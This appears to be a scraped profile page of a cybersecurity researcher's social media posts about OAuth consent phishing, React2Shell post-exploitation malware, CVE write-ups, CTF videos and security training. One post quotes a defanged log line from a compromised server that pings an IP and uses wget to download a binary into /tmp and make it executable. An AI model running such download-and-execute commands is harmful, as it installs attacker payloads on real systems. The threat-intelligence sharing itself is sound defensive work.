John Hammond (@_JohnHammond)
307K followers, 45K following, 3K media, 9K statuses
Cybersecurity Researcher @HuntressLabs || Just Hacking Training @JustHackingHQ w/ @ethicalhacker || https://t.co/UtsNJiyiEk || https://t.co/narO3syzIy
Joined March 2015
"'ConsentFix', a browser-based ClickFix-style attack with OAuth consent grants" ... leveraging the Azure CLI app client to social engineer for easy access into Entra ID 👀 I got nerdsniped by this, so I played with it a bit and tried a drag-and-drop gesture! Video:
What? @_JohnHammond the podcast intro guy!? Wait, what!? Honestly so much fun on this one, and John totally outdid us by coming insanely well prepared with all the Christmas decorations...
Episode 26: (Christmas) War Stories with John Hammond! @0xTib3rius & @SwiftSecur1 are joined by @_JohnHammond who shares some war stories in our first Christmas episode! Links below!
Congrats @RussianPanda9xx for winning the Community Cyber Defender Practitioner of the Year award in the 2025 SANS Difference Makers Awards! First award for a @HuntressLabs teammate! #SANSDMA
🚨 New Course 🚨 WMD 5 continues the Windows Malware Dev Advanced Path! Make your own custom C2 agent with @DahvidSchloss, former US Special Ops & @defcon Instructor. https://t.co/OWysu64f13 With 12.5 hours of video, written instructions, quizzes and your own dedicated virtual
Good luck to all bidders in the Ginger Hacker Initiative Silent Auction 2025! Your winning bids go to a worthy cause, and you just might win some great training from @_JohnHammond, @mish3alkhan & @Antonlovesdnb from our list of donations from https://t.co/wi55NNKCBc: 🎁 1
justhacking.com
Just Hacking provides "Focused Technical Training for All Levels" with 4 types of affordable, hands-on options by John Hammond & All-Stars.
Infostealer malware logs -- maybe an unconventional threat intel source, but Estelle Ruellan shows me her sweet research using LLMs to analyze stealer logs at scale: - How did a victim get infected? - Can we uncover a threat actor when they infect themselves? and more. Video:
Before React exploded I was helping chase some more shenanigans with Gladinet CentreStack & Triofox -- another LFI vulnerability that led (again) to the .NET ViewState deserialization CVE-2025-30406 remote code execution. Patch is available but we're seeing active exploitation:
Errybody screaming about React2Shell so we wanted to give ya something you haven't already heard😁 Here's a beast of a blog post on malware we've seen from post-exploitation, detailing a wild Linux backdoor and more -- all from the amazing & incredible @RussianPanda9xx & co.😎
Super hyped to share that @HuntressLabs published a Rapid Response blog on the recent #React2Shell post-exploitations observed. We discovered and analyzed a few payloads that were named #PeerBlight, #CowTunnel and #ZinFoq. We also observed a variant of #Kaiji malware. 3 Modelo's
Continuing THE FUTURE IS ****** comic book Capture The Flag challenges! Carving email attachments to uncover malicious Microsoft Office macros with olevba, prompt injection within an AI chatbot, and tracking network packets to uncover flags! Video: https://t.co/vwK2TPLCLK
The release of the ConDef MCP is coming 👀 What can it do? ▶️ List modules by "tag" or "keyword" - love networking? Ask Claude to show you modules with networking components only ▶️ Summarize and explain modules for newer folks ▶️ Integrate with ATT&CK & Atomic Red Team
Someone emailed me a log from a VPS with a vulnerable NextJS version that was presumably compromised by React2Shell. Unsure if others are seeing similar, but seems to be dumbo cryptominer. - ping 45.157.233[.]80 - wget http[:]//45.76.155[.]14/vim -O /tmp/vim ; chmod +x
Yapping about the GlassWorm supply chain malware campaign and the neato tricks it uses with "Invisible Unicode" characters -- essentially whitespace steganography, showcasing the Hangul Filler, zero-width space, & Private Use Area characters 🤯 Video: https://t.co/QAwvC8s4wv
Big thanks to @tryhackme for their continued support of the channel! You can jump into the Advent of Cyber 2025 event right now, it is free to play and anyone can join to level up their cybersecurity skills with a new task every day!
tryhackme.com
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
Flattered to help start the party for the Advent of Cyber Day 02 task from TryHackMe -- walking through today's challenge using the Social Engineer Toolkit to send a phishing email and snag passwords with a simple Python HTTP server! Video: https://t.co/Yr9zT0wPPN